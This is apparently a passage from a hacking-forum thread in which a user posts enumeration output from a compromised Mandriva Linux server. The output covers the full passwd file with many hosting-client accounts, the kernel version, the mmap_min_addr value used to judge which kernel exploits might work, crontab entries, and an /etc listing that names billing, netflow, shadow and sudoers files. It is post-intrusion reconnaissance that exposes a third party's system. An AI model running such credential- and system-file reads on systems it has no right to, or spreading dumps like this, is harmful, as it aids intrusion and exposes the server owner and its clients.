    bin:x:1:1:bin:/bin:/bin/sh
    daemon:x:2:2:daemon:/sbin:/bin/sh
    adm:x:3:4:adm:/var/adm:/bin/sh
    lp:x:4:7:lp:/var/spool/lpd:/bin/sh
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/bin/sh
    news:x:9:13:news:/var/spool/news:/bin/sh
    uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
    operator:x:11:0:operator:/var:/bin/sh
    games:x:12:100:games:/usr/games:/bin/sh
    nobody:x:65534:65534:Nobody:/:/bin/sh
    messagebus:x:13:101:system user for dbus:/:/sbin/nologin
    avahi:x:14:102:system user for avahi:/var/avahi:/bin/false
    avahi-autoipd:x:15:103:system user for avahi:/var/avahi:/bin/false
    polkituser:x:16:16:system user for policykit:/:/sbin/nologin
    rtkit:x:17:17:system user for rtkit:/proc:/sbin/nologin
    haldaemon:x:18:18:system user for hal:/:/sbin/nologin
    rpm:x:19:104:system user for rpm:/var/lib/rpm:/bin/false
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    xguest:x:10000:10000:Guest Account:/home/xguest:/bin/bash
    htdig:x:70:108::/var/lib/htdig:
    rpc:x:71:71:system user for rpcbind:/var/lib/rpcbind:/sbin/nologin
    rpcuser:x:72:72:system user for nfs-utils:/var/lib/nfs:/bin/false
    oleg:x:10001:10001:oleg:/home/oleg:/bin/bash
    ntp:x:73:73:system user for ntp:/etc/ntp:/bin/false
    mysql:x:10002:10002::/home/mysql:/bin/bash
    sshd:x:74:74:system user for openssh:/var/empty:/bin/true
    apache:x:75:75:system user for apache-conf:/var/www:/bin/sh
    named:x:76:76:system user for bind:/var/lib/named:/bin/false
    postgres:x:10003:10003:PostgreSQL:/usr/local/pgsql:/bin/bash
    ftp:x:77:77:system user for proftpd:/var/ftp:/bin/false
    atrix:x:10004:10004::/home/atrix:/bin/bash
    alyans:x:10005:10004::/home/alyans:/bin/bash
    utea:x:10006:10004::/home/utea:/bin/bash
    mamsiki:x:10007:10004::/home/mamsiki:/bin/bash
    udarnik:x:10008:10004::/home/udarnik:/bin/bash
    slingberry:x:10009:10004::/home/slingberry:/bin/bash
    vinik:x:10010:10004::/home/vinik:/bin/bash
    lyminofors:x:10011:10004::/home/lyminofors:/bin/bash
    stas:x:10012:10004::/home/stas:/bin/bash
    taxi-aist:x:10013:10004::/home/taxi-aist:/bin/bash
    prestig:x:10014:10014::/home/prestig:/bin/bash
    lavka:x:10015:10004::/home/lavka:/bin/bash
    lab-system:x:10016:10016::/home/lab-system:/bin/bash
    mailnull:x:78:78:system user for sendmail:/var/spool/mqueue:/dev/null
    smmsp:x:79:79:system user for sendmail:/var/spool/mqueue:/dev/null
    evgeny:x:10017:10017::/home/evgeny:/bin/bash
    suexec:x:10018:10018::/home/suexec:/bin/bash
    pushka:x:10019:10019::/home/pushka:/bin/bash
    read:x:10020:10019::/home/pushka/ftp:/bin/bash
    molochko:x:10021:10021::/home/molochko:/bin/bash
    roman:x:10022:10022::/home/roman:/bin/bash
    konopleff:x:10023:10023::/home/konopleff:/bin/bash
    banya-mobile:x:10024:10024::/home/banya-mobile:/bin/bash
    stroytehnology:x:10025:10025::/home/stroytehnology:/bin/bash
    avtocar:x:10026:10026::/home/avtocar:/bin/bash
    kvanta:x:10027:10027::/home/kvanta:/bin/bash
    veron:x:10028:10028::/home/veron:/bin/bash
    gradient:x:10029:10029::/home/gradient:/bin/bash
    eda-perm:x:10030:10030::/home/eda-perm:/bin/bash
    gnom85:x:10031:10031::/home/gnom85:/bin/bash
    swi49:x:10032:10032::/home/swi49:/bin/bash
    ult-perm:x:10033:10033::/home/ult-perm:/bin/bash
    fotoroman:x:10034:10034::/home/fotoroman:/bin/bash
    esb59:x:10035:10035::/home/esb59:/bin/bash
    vaskolot:x:10036:10036::/home/vaskolot:/bin/bash
    gilinorg:x:10037:10037::/home/gilinorg:/bin/bash
    star:x:10038:10038::/home/star:/bin/bash
    prepress:x:10039:10039::/home/prepress:/bin/bash
    ds-valentine:x:10040:10040::/home/ds-valentine:/bin/bash
    drwcs:x:10041:10041:Dr.Web AV-Desk Server:/var/opt/drwcs:/bin/false
    prservice:x:10042:10042::/home/prservice:/bin/bash
    center-nm:x:10043:10043::/home/center-nm:/bin/bash
    waterperm:x:10044:10044::/home/waterperm:/bin/bash
    albion-sk:x:10045:10045::/home/albion-sk:/bin/bash
    rudinftp:x:10046:10046::/home/rudinftp:/bin/bash
    avisperm:x:10047:10047::/home/avisperm:/bin/bash
    slingoteka:x:10048:10048::/home/slingoteka:/bin/bash
    slingoliga:x:10049:10049::/home/slingoliga:/bin/bash
    
    Code:
    ================================================[b][COLOR=Red]cat /etc/issue[/b][/COLOR]================================================
    Mandriva Linux release 2010.0 (Official) for x86_64
    Kernel 2.6.31.14-desktop-1mnb on a 4-processor x86_64 / \l
    ================================================[b][COLOR=Red]cat /etc/issue.net[/b][/COLOR]================================================
    Welcome to Mandriva Linux
    -------------------------
    ================================================[b][COLOR=Red]cat /proc/sys/vm/mmap_min_addr[/b][/COLOR]================================================
    4096
    ================================================[b][COLOR=Red]cat /etc/crontab[/b][/COLOR]================================================
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # run-parts
    01 * * * * root nice -n 19 run-parts --report /etc/cron.hourly
    02 4 * * * root nice -n 19 run-parts --report /etc/cron.daily
    22 4 * * 0 root nice -n 19 run-parts --report /etc/cron.weekly
    42 4 1 * * root nice -n 19 run-parts --report /etc/cron.monthly
    ================================================[b][COLOR=Red]ls -la /etc/cron.d[/b][/COLOR]================================================
    total 32
    drwxr-xr-x   2 root root  4096 Dec 22  2011 .
    drwxr-xr-x 112 root root 12288 Dec  2 11:22 ..
    -rw-r--r--   1 root root    86 Jan 17  2010 cacti
    -rw-r--r--   1 root root   127 Jun 25  2009 glpi
    -rw-r--r--   1 root root    56 Apr 22  2010 msec
    -rw-r--r--   1 root root   454 Dec 15  2010 php
    ================================================[b][COLOR=Red]ls -la /etc/cron.hourly[/b][/COLOR]================================================
    total 20
    drwxr-xr-x   2 root root  4096 Apr 22  2010 .
    drwxr-xr-x 112 root root 12288 Dec  2 11:22 ..
    -rwxr-xr-x   1 root root   424 Sep 24  2009 0anacron
    lrwxrwxrwx   1 root root    14 Apr 22  2010 msec -> /usr/sbin/msec
    ================================================[b][COLOR=Red]ls -la /etc/cron.monthly[/b][/COLOR]================================================
    total 24
    drwxr-xr-x   2 root root  4096 Apr 22  2010 .
    drwxr-xr-x 112 root root 12288 Dec  2 11:22 ..
    -rwxr-xr-x   1 root root   113 Sep 24  2009 0anacron-timestamp
    -rwxr-xr-x   1 root root   111 Sep 26  2009 readahead-monthly.cron
    ================================================[b][COLOR=Red]ls -la /etc/cron.weekly[/b][/COLOR]================================================
    total 32
    drwxr-xr-x   2 root root  4096 Apr 22  2010 .
    drwxr-xr-x 112 root root 12288 Dec  2 11:22 ..
    -rwxr-xr-x   1 root root   111 Sep 24  2009 0anacron-timestamp
    -rwxr-xr-x   1 root root  1530 Oct  8  2009 99-raid-check
    -rwxr-xr-x   1 root root    66 Sep 30  2009 makewhatis-en.cron
    -rwxr-xr-x   1 root root   950 Sep  3  2009 makewhatis.cron
    ================================================[b][COLOR=Red]ls -la /etc[/b][/COLOR]================================================
    total 2516
    drwxr-xr-x 112 root   root    12288 Dec  2 11:22 .
    drwxr-xr-x  24 root   adm      4096 Dec  2 12:57 ..
    -rw-r--r--   1 root   root       60 Feb 18  2012 .gnokiirc
    -rw-------   1 root   root        0 Apr 22  2010 .pwd.lock
    -rw-r--r--   1 root   root       15 Oct 11  2010 .serial.conf.old
    drwxr-xr-x   5 root   root     4096 Apr 22  2010 ConsoleKit
    -rw-r--r--   1 root   root     5617 Jan 23  2010 DIR_COLORS
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 NetworkManager
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 PolicyKit
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 RPM-GPG-KEYS
    drwxr-xr-x   9 root   root     4096 May 22  2010 X11
    drwxr-xr-x   4 root   root     4096 Apr 22  2010 acpi
    -rw-r--r--   1 root   root       44 Dec  2 11:15 adjtime
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 akonadi
    -rw-r--r--   1 root   root      732 Jan 12  2010 aliases
    -rw-r-----   1 root   mail    12288 Dec 30 04:02 aliases.db
    drwxr-xr-x   2 root   root     4096 Feb 20  2012 alternatives
    -rw-r--r--   1 root   root      559 Sep 24  2009 anacrontab
    drwxr-xr-x   2 root   root     4096 May 21  2010 apparmor.d
    -rw-r--r--   1 root   root     4444 Jun  4  2010 asound.state
    -rw-r-----   1 root   daemon      1 Sep  2  2009 at.deny
    drwxr-x---   3 root   root     4096 Jun  8  2010 audisp
    drwxr-x---   2 root   root     4096 Jun  8  2010 audit
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 avahi
    drwxr-xr-x   2 root   root     4096 May 18  2010 bash_completion.d
    -rw-r--r--   1 root   root     1601 Oct  6  2009 bashrc
    -rwxr-xr-x   1 root   root     2407 Dec 21  2010 billing.cisco831.conf
    -rwxr-xr-x   1 root   root     2326 Jan 15  2010 billing.conf
    -rwxr-xr-x   1 root   root     2380 Feb 12  2010 billing.radius.cisco.conf
    -rwxr-xr-x   1 root   root     2327 Apr 20  2010 billing.radius.cosm.conf
    -rwxr-xr-x   1 root   root     2327 Feb 12  2010 billing.radius.druzby.conf
    -rwxr-xr-x   1 root   root     2327 Oct 14  2011 billing.radius.dz59.conf
    -rwxr-xr-x   1 root   root     2327 Apr  7  2010 billing.radius.kirova37.conf
    -rwxr-xr-x   1 root   root     2327 Feb  7  2011 billing.radius.kirovogr.conf
    -rwxr-xr-x   1 root   root     2327 Apr 30  2010 billing.radius.krym.conf
    -rwxr-xr-x   1 root   root     2327 Jun 10  2010 billing.radius.lasv.conf
    -rwxr-xr-x   1 root   root     2327 Mar 31  2010 billing.radius.lebedeva.conf
    -rwxr-xr-x   1 root   root     2327 Aug  4  2010 billing.radius.org.conf
    -rwxr-xr-x   1 root   root     2327 Oct  3  2011 billing.radius.shaiba.conf
    -rwxr-xr-x   1 root   root     2327 May 18  2010 billing.radius.tramvainaya33.conf
    -rwxr-xr-x   1 root   root     2327 May 24  2010 billing.radius.ural.conf
    -rwxr-xr-x   1 root   root     2327 Feb 15  2011 billing.radius.zvezda13.conf
    -rwxr-xr-x   1 root   root     2327 Jun 29  2010 billing.radius.zvezda20.conf
    -rwxr-xr-x   1 root   root     2326 Dec 18  2009 billing.server.conf
    -rwxr-xr-x   1 root   root     2363 Apr 12  2010 billing.tda600com.conf
    -rwxr-xr-x   1 root   root     2326 Dec 18  2009 billing.voip.conf
    -rwxr-xr-x   1 root   root     2407 Aug 26  2011 billing.voip1751.conf
    -rwxr-xr-x   1 root   root     2407 Mar  9  2011 billing_vpn.conf
    drwxr-xr-x   2 root   root     4096 Jul 25 12:55 blkid
    -rw-r--r--   1 root   root      614 Jul 25 12:55 blkid.tab
    -rw-r--r--   1 root   root      614 Jul 25 12:55 blkid.tab.old
    drwxr-xr-x   3 root   root     4096 Feb 20  2012 bluetooth
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 bonobo-activation
    -rw-r--r--   1 root   root     2036 Nov 24  2010 cacti.conf
    -rw-r--r--   1 root   root      177 Aug 27  2009 cdserver
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 codeina
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 coherence
    drwxr-xr-x   2 root   root     4096 Dec 22  2011 cron.d
    drwxr-xr-x   2 root   root     4096 May 18  2010 cron.daily
    -rw-r--r--   1 root   root        0 Sep 24  2009 cron.deny
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 cron.hourly
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 cron.monthly
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 cron.weekly
    drwxr-xr-x   2 root   root     4096 Aug 10  2009 cron.yearly
    -rw-r--r--   1 root   root      335 Aug 10  2009 crontab
    -rw-r--r--   1 root   root      900 Apr 12  2009 csh.cshrc
    -rw-r--r--   1 root   root      644 Apr 10  2009 csh.login
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 cups
    drwxr-xr-x   2 root   root     4096 Feb 18  2012 cvs
    drwxr-xr-x   4 root   root     4096 Apr 22  2010 dbus-1
    drwxr-xr-x   2 root   root     4096 Sep  2  2009 default
    drwxr-xr-x   2 root   root     4096 Oct 21  2009 depmod.d
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 desktop-profiles
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 dirmngr
    -rw-rw-r--   1 root   disk        0 Sep 24  2009 dumpdates
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 dynamic
    -rw-r--r--   1 root   root       34 Aug 13  2009 e2fsck.conf
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 emacs
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 enscript
    -rw-r--r--   1 root   root     4843 Sep  2  2009 enscript.cfg
    -rw-r--r--   1 root   root       97 Oct  7  2009 environment
    -rwxr-xr-x   1 root   root      246 Oct 21  2009 esd.conf
    -rw-r--r--   1 root   root    14890 Sep  2  2009 fax.config
    -rw-r--r--   1 root   root       56 Apr 10  2009 filesystems
    drwxr-xr-x   4 root   root     4096 May 18  2010 fonts
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 foomatic
    -rw-r--r--   1 root   root     9141 May 27  2009 foremost.conf
    -rw-rw-r--   1 root   root      352 Apr 23  2010 fstab
    -rw-r--r--   1 root   root      310 Apr 22  2010 fstab.old
    -rw-r--r--   1 root   root       29 Apr 10  2009 fstab.rpmnew
    -rw-r--r--   1 root   root       79 May 26  2010 ftpusers
    drwxr-xr-x   9 root   root     4096 Apr 22  2010 gconf
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 ggi
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 gimp
    drwxr-xr-x   2 apache apache   4096 Mar 22  2011 glpi
    -rw-r--r--   1 root   root     8200 Feb 20  2012 gnokiirc
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 gnome-vfs-2.0
    -rw-r--r--   1 root   root    10854 Aug 11  2009 gnome-vfs-mime-magic
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 gre.d
    -rw-r--r--   1 root   root     1349 Nov 16 19:01 group
    -rw-------   1 root   root     1329 Nov 16 18:57 group-
    -r--r-----   1 root   shadow   1009 Nov 16 19:01 gshadow
    -rw-------   1 root   root      994 Nov 16 18:57 gshadow-
    -rw-r--r--   1 root   root      811 Sep 21  2009 gssapi_mech.conf
    drwxr-xr-x   2 root   root     4096 Nov  1  2011 gtk-2.0
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 hal
    -rw-r--r--   1 root   root    29293 Oct  4  2009 hddtemp.db
    -rw-r--r--   1 root   root       51 Apr 22  2010 host.conf
    -rw-r--r--   1 root   root       46 Jun 23  2010 hosts
    -rw-r--r--   1 root   root      161 Apr 10  2009 hosts.allow
    -rw-r--r--   1 root   root      347 Apr 10  2009 hosts.deny
    -rw-r--r--   1 root   root       34 Apr 10  2009 hosts.rpmnew
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 htdig
    drwxr-xr-x   5 root   root     4096 May 18  2010 httpd
    -rw-r--r--   1 root   root      146 Sep 21  2009 idmapd.conf
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 ifplugd
    -rw-r--r--   1 root   root       27 Apr 22  2010 iftab
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 ifw
    -rw-r--r--   1 root   root    19980 Feb 18  2012 info-dir
    lrwxrwxrwx   1 root   root       11 Apr 22  2010 init.d -> rc.d/init.d
    -rw-r--r--   1 root   root      658 Oct 27  2009 initlog.conf
    -rw-r--r--   1 root   root     1671 May 22  2010 inittab
    -rw-r--r--   1 root   root     1978 Apr 10  2009 inputrc
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 iproute2
    -rw-r--r--   1 root   root      111 Dec  2 11:15 issue
    -rw-r--r--   1 root   root       52 Dec  2 11:15 issue.net
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 java
    
     
  10. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    продолжение:
    Code:
    drwxr-xr-x   2 root   root     4096 Oct  5  2009 jvm
    drwxr-xr-x   2 root   root     4096 Oct  5  2009 jvm-commmon
    lrwxrwxrwx   1 root   root       29 Apr 22  2010 kde4rc -> /etc/alternatives/kde4-config
    drwxr-xr-x   2 root   root     4096 Oct  3  2009 kerberos
    -rw-r--r--   1 root   root      668 Oct  3  2009 krb5.conf
    -rw-r--r--   1 root   root      110 Aug 16  2009 kstylerc
    -rw-r--r--   1 root   root     1127 Jan 16  2009 ksysguarddrc
    -rw-r--r--   1 root   root   114213 Nov 26 11:13 ld.so.cache
    -rw-r--r--   1 root   root       48 Apr 22  2010 ld.so.conf
    drwxr-xr-x   3 root   root     4096 Nov 25  2011 ld.so.conf.d
    -rw-r--r--   1 root   root     3530 Jul 22  2009 lftp.conf
    -rw-r-----   1 root   root      191 Jul 28  2009 libaudit.conf
    -rw-r--r--   1 root   root     2290 Sep 24  2009 libuser.conf
    drwxr-xr-x 101 root   root     4096 Apr 22  2010 locale
    -rw-r--r--   1 root   root     1252 Apr  3  2012 localtime
    -rw-r--r--   1 root   root     1944 Oct 31  2011 localtime_NSK
    -rw-r--r--   1 root   root      126 Oct 29 17:00 localtime_bckp
    -rw-r-----   1 root   shadow   1825 Sep  3  2009 login.defs
    -rw-r--r--   1 root   root      664 Sep  3  2009 logrotate.conf
    drwxr-xr-x   2 root   root     4096 Feb 28  2012 logrotate.d
    -rw-r--r--   1 root   root      157 Oct 29  2009 lsb-release
    drwxr-xr-x   2 root   root     4096 Oct 29  2009 lsb-release.d
    -rw-r--r--   1 root   root       66 Sep  3  2009 lynx-site.cfg
    -rw-r--r--   1 root   root   144013 Sep  3  2009 lynx.cfg
    -rw-r--r--   1 root   root     3582 Sep  3  2009 lynx.lss
    drwxr-xr-x   2 root   root     4096 Jun 23  2010 mail
    -rw-r--r--   1 root   root    10899 Sep  3  2009 mailcap
    -rw-r--r--   1 root   root     9407 Sep  3  2009 mailcap.vga
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 makedev.d
    -rw-r--r--   1 root   root     4829 Sep  3  2009 man.config
    lrwxrwxrwx   1 root   root       16 Apr 22  2010 mandrake-release -> mandriva-release
    lrwxrwxrwx   1 root   root       16 Apr 22  2010 mandrakelinux-release -> mandriva-release
    -rw-r--r--   1 root   root       52 Oct 29  2009 mandriva-release
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 maven
    -rwxrwxr-x   1 root   root       67 May 18  2010 mcc.conf
    -rw-r--r--   1 root   root       92 Apr 22  2010 mdadm.conf
    -rw-r--r--   1 root   root      123 Sep  3  2009 mdns.allow
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 menu.d
    -rw-r--r--   1 root   root    29583 Sep  3  2009 mime.types
    -rw-r--r--   1 root   root     1112 Oct  4  2009 minicom.users
    -rw-r--r--   1 root   root      170 Feb 16  2012 minirc.dfl
    -rw-r--r--   1 root   root       97 Jun 11  2010 minirc.minicom.conf
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 mirrordir
    -rw-r--r--   1 root   root      803 Oct  7  2009 mke2fs.conf
    -rw-r--r--   1 root   root      163 Jul 25 20:01 modprobe.conf
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 modprobe.d
    -rw-r--r--   1 root   root      358 Jul 25 20:01 modprobe.preload
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 modprobe.preload.d
    -rw-r--r--   1 root   root      244 Oct 27  2009 modules
    -rw-r--r--   1 root   root        0 Apr 10  2009 motd
    drwxr-xr-x   2 root   root     4096 Jan 20  2011 mrtg
    -rw-r--r--   1 root   root      207 Dec  2 11:16 mtab
    -rw-r--r--   1 root   root     2521 Apr 22  2010 mtools.conf
    -rw-r--r--   1 root   root     5402 Dec  2 11:22 my.cnf
    -rw-r--r--   1 root   root     5155 Apr 23  2010 my.cnf_bak
    -rw-r--r--   1 root   root     1918 Sep 28  2009 nail.rc
    lrwxrwxrwx   1 root   root       31 May 21  2010 named.conf -> ../var/lib/named/etc/named.conf
    -rw-r--r--   1 root   root     7676 Sep  4  2009 nanorc
    -rw-r--r--   1 root   root      768 Jun  8  2009 netconfig
    -rwxr-xr-x   1 root   root     2329 Dec  2  2011 netflow.310.conf
    -rwxr-xr-x   1 root   root     2329 Jun  4  2010 netflow.cisco.conf
    -rwxr-xr-x   1 root   root     2329 Oct 14  2011 netflow.dz59.conf
    -rwxr-xr-x   1 root   root     2329 Apr 25  2011 netflow.leb9.conf
    -rwxr-xr-x   1 root   root     2329 Sep 25  2010 netflow.org.conf
    -rwxr-xr-x   1 root   root     2329 Oct  3  2011 netflow.shaiba.conf
    -rwxr-xr-x   1 root   root     2329 Jan 14  2011 netflow.sold16.conf
    -rwxr-xr-x   1 root   root     2329 Feb 15  2011 netflow.zvezda13.conf
    -rwxr-xr-x   1 root   root     2329 Jul 27  2011 netflow.zvezda20.conf
    drwxr-xr-x   4 root   root     4096 Apr 22  2010 netprofile
    -rw-r--r--   1 root   root       58 Oct 27  2009 networks
    -rw-r--r--   1 root   root     1285 Apr 22  2010 nsswitch.conf
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 ntp
    -rw-rw-rw-   1 root   root      436 Jun  6  2012 ntp.conf
    -rw-r--r--   1 root   root     2304 Jun  6  2012 ntp.conf_june
    -rw-r--r--   1 root   root     1493 Apr 22  2010 ntp.conf_orig
    -rw-rw-rw-   1 root   root        7 Jan  2 15:16 ntp.drift.TEMP
    drwxr-xr-x   2 root   root     4096 Feb 20  2012 obex-data-server
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 openldap
    drwxr-xr-x   2 root   root     4096 Mar 20  2012 pam.d
    drwxr-xr-x   4 root   root     4096 Nov  1  2011 pango
    -rw-r--r--   1 root   root     4012 Nov 16 19:01 passwd
    -rw-r--r--   1 root   root     3959 Nov 16 18:57 passwd-
    drwxr-xr-x   2 root   root     4096 Oct  2  2009 pear
    -rw-r--r--   1 root   root      949 Oct  2  2009 pear.conf
    -rw-r--r--   1 root   root    68795 Dec 11  2010 php-cgi-fcgi.ini
    -rw-r--r--   1 root   root    12843 Dec 15  2010 php-fpm.conf
    drwxr-xr-x   2 root   root     4096 Feb  8  2011 php-fpm.d
    drwxr-xr-x   2 root   root     4096 Dec  6 13:37 php.d
    -rw-r--r--   1 root   root    68888 Oct 31 13:59 php.ini
    -rw-r--r--   1 root   root    76324 Feb  8  2011 php.ini.ccpbackup
    drwxr-xr-x   5 root   root     4096 Apr 19  2012 pki
    drwxr-xr-x   5 root   root     4096 Apr 22  2010 pm
    drwxr-xr-x   4 root   root     4096 Apr 22  2010 polkit-1
    -rw-r--r--   1 root   root      172 May 21  2010 postgres-reg.ini
    drwxr-xr-x   5 root   root     4096 May 22  2010 ppp
    -rw-r--r--   1 root   root     5297 May 24  2009 preload.conf
    -rw-r--r--   1 root   root      289 Apr 10  2009 printcap
    lrwxrwxrwx   1 root   root       20 Apr 22  2010 product.id -> product.id.Powerpack
    -rw-r--r--   1 root   root      126 Oct 29  2009 product.id.Powerpack
    -rw-r--r--   1 root   root      739 Apr 10  2009 profile
    drwxr-xr-x   2 root   root     4096 May 15  2012 profile.d
    -rw-r--r--   1 root   root      489 Apr  4  2011 proftpd-anonymous.conf
    -rw-r--r--   1 root   root      456 May 26  2010 proftpd-anonymous.conf.rpmsave
    -rw-r--r--   1 root   root     5119 Mar 20  2012 proftpd.conf
    -rw-r--r--   1 root   root     3381 May 26  2010 proftpd.conf.rpmsave
    drwxr-xr-x   2 root   root     4096 Feb 28  2012 proftpd.d
    -rw-r--r--   1 root   root     5807 Apr 10  2009 protocols
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 pulse
    -rw-r--r--   1 root   root      368 Oct 28  2009 pythonrc.py
    -rw-r--r--   1 root   root      123 Apr 22  2010 qtrc
    lrwxrwxrwx   1 root   root        7 Apr 22  2010 rc -> rc.d/rc
    drwxr-xr-x  11 root   root     4096 Sep 28  2011 rc.d
    lrwxrwxrwx   1 root   root       13 Apr 22  2010 rc.local -> rc.d/rc.local
    -rwxr-xr-x   1 root   root      937 Oct 27  2009 rc.modules
    lrwxrwxrwx   1 root   root       15 Apr 22  2010 rc.sysinit -> rc.d/rc.sysinit
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rc0.d -> rc.d/rc0.d
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rc1.d -> rc.d/rc1.d
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rc2.d -> rc.d/rc2.d
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rc3.d -> rc.d/rc3.d
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rc4.d -> rc.d/rc4.d
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rc5.d -> rc.d/rc5.d
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rc6.d -> rc.d/rc6.d
    lrwxrwxrwx   1 root   root       10 Apr 22  2010 rcS.d -> rc.d/rcS.d
    -rw-r--r--   1 root   root      958 Sep 26  2009 readahead.conf
    -rw-r--r--   1 root   root     1356 Nov 26 10:48 reader.conf
    drwxr-xr-x   2 root   root     4096 Nov 26 10:48 reader.conf.d
    lrwxrwxrwx   1 root   root       16 Apr 22  2010 redhat-release -> mandriva-release
    lrwxrwxrwx   1 root   root       16 Apr 22  2010 release -> mandriva-release
    -rw-r--r--   1 root   root     1579 Oct  4  2009 request-key.conf
    lrwxrwxrwx   1 root   root       20 May 22  2010 resolv.conf -> /etc/ppp/resolv.conf
    lrwxrwxrwx   1 root   root       20 May 22  2010 resolv.conf.save -> /etc/ppp/resolv.conf
    drwxr-xr-x   5 root   root     4096 Apr 22  2010 resolvconf
    lrwxrwxrwx   1 root   root       11 Apr 22  2010 rmt -> ../sbin/rmt
    lrwxrwxrwx   1 root   root       30 May 21  2010 rndc.conf -> ../var/lib/named/etc/rndc.conf
    lrwxrwxrwx   1 root   root       29 May 21  2010 rndc.key -> ../var/lib/named/etc/rndc.key
    -rw-r--r--   1 root   root     1615 Nov 25  2011 rpc
    drwxr-xr-x   3 root   root     4096 Apr 23  2010 rpm
    -rw-------   1 root   root     7290 Sep  3  2009 rsnapshot.conf
    -rw-r--r--   1 root   root     7286 Sep  3  2009 rsnapshot.conf.default
    -rw-r--r--   1 root   root      910 Oct 27  2009 rwtab
    drwxr-xr-x   2 root   root     4096 Oct 27  2009 rwtab.d
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 samba
    drwxr-xr-x   3 root   root     4096 Apr 22  2010 sane.d
    drwxr-xr-x   2 root   root     4096 May 18  2009 sasl2
    -rw-r--r--   1 root   root     3302 Jun 23  2009 screenrc
    -rw-r--r--   1 root   root        1 Sep  3  2009 secure-mcservusers
    -rw-r--r--   1 root   root       74 Jul 12  2010 securetty
    drwxr-xr-x   6 root   root     4096 Apr 22  2010 security
    -rw-r--r--   1 root   root     6845 Sep 28  2009 sensors3.conf
    -rw-r--r--   1 root   root      330 Oct 11  2010 serial.conf
    -rw-r--r--   1 root   root    20939 Apr 10  2009 services
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 sgml
    -r--r-----   1 root   shadow   5009 Dec  2 00:23 shadow
    -r--r-----   1 root   shadow   4918 Nov 16 18:57 shadow-
    -rw-r--r--   1 root   root       28 Apr 22  2010 shells
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 shorewall
    drwxr-xr-x   5 root   root     4096 Apr 22  2010 skel
    -rwxr-xr-x   1 root   root     4521 Sep  3  2009 smartd.conf
    -rw-r--r--   1 root   root     1307 Sep  3  2009 smi.conf
    drwxr-xr-x   2 root   root     4096 Jan 12  2010 smrsh
    drwxr-xr-x   2 root   root     4096 Mar  2  2011 snmp
    drwxr-xr-x   4 root   root     4096 Apr 22  2010 sound
    drwxr-xr-x   2 root   root     4096 Mar 20  2012 ssh
    drwxr-xr-x   3 root   root     4096 Jun 23  2010 ssl
    -rw-r--r--   1 root   root      212 Oct 27  2009 statetab
    drwxr-xr-x   2 root   root     4096 Oct 27  2009 statetab.d
    -r--r-----   1 root   root      715 Aug 10  2009 sudoers
    -rw-r--r--   1 root   root     1817 Sep  9  2009 suspend.conf
    drwxr-xr-x   8 root   root     4096 Nov 21 17:46 sysconfig
    -rw-r--r--   1 root   root     1355 Apr 22  2010 sysctl.conf
    -rw-r--r--   1 root   root     1173 Sep  3  2009 syslog.conf
    drwxr-xr-x   2 root   root     4096 Sep  3  2009 t1lib
    -rw-r--r--   1 root   root   703506 Sep  3  2009 termcap
    drwxr-xr-x   5 root   root     4096 Apr 22  2010 udev
    -rw-r--r--   1 root   root      559 Sep 16  2009 updatedb.conf
    drwxr-xr-x   3 root   root     4096 Oct 31 15:11 urpmi
    -rw-r--r--   1 root   root       20 Oct 29  2009 version
    drwxr-xr-x   2 root   root     4096 Apr 22  2010 vim
    -rw-r--r--   1 root   root     2888 Sep 25  2009 vnstat.conf
    drwx------   2 root   root     4096 May 26  2010 vsftpd
    drwxr-xr-x 149 root   root     4096 Dec  2  2011 webmin
    -rw-r--r--   1 root   root     4479 Sep 23  2009 wgetrc
    -rw-r--r--   1 root   root      622 Sep  9  2009 wshaper.cfg
